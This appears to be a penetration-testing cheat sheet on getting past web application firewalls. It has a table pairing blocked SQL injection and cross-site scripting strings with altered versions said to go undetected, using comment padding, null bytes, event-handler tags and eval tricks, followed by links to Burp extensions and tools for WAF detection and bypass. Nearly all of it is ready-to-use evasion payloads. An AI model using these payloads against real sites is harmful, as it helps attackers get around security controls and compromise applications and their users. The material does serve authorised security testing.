WAF Bypass

Blocked Attack	Undetected modification
'or 1=1 --	' or 2=2--
alert(0)	%00alert(0)
<script>alert(0)</script>	<script type=vbscript>MsgBox(0)</script>
' or ""='r	'/**/OR/**/""='
<script>alert(0)</script>	<img src="x:x" onerror="alert(0)"></img>
<img src=x:x onerror=alert(0)//></img>	<img src=http://url onload=alert(0)//></img>
1 or 1=1	(1)or(1)=(1)
eval(name)	x=this.name
eval(name)	X(0?$:name+1)

bypasswaf - Burp Extension

GitHub - codewatchorg/bypasswaf: Add headers to all Burp requests to bypass some WAF productsGitHub

nowafpls - Burp Extension

GitHub - assetnote/nowafpls: Burp Plugin to Bypass WAFs through the insertion of Junk DataGitHub

WAF Community Bypasses

GitHub - waf-bypass-maker/waf-community-bypassesGitHub

Tools

GitHub - nemesida-waf/waf-bypass: Check your WAF before an attacker does this oneGitHub

WhatWaf

GitHub - Ekultek/WhatWaf: Detect and bypass web application firewalls and protection systemsGitHub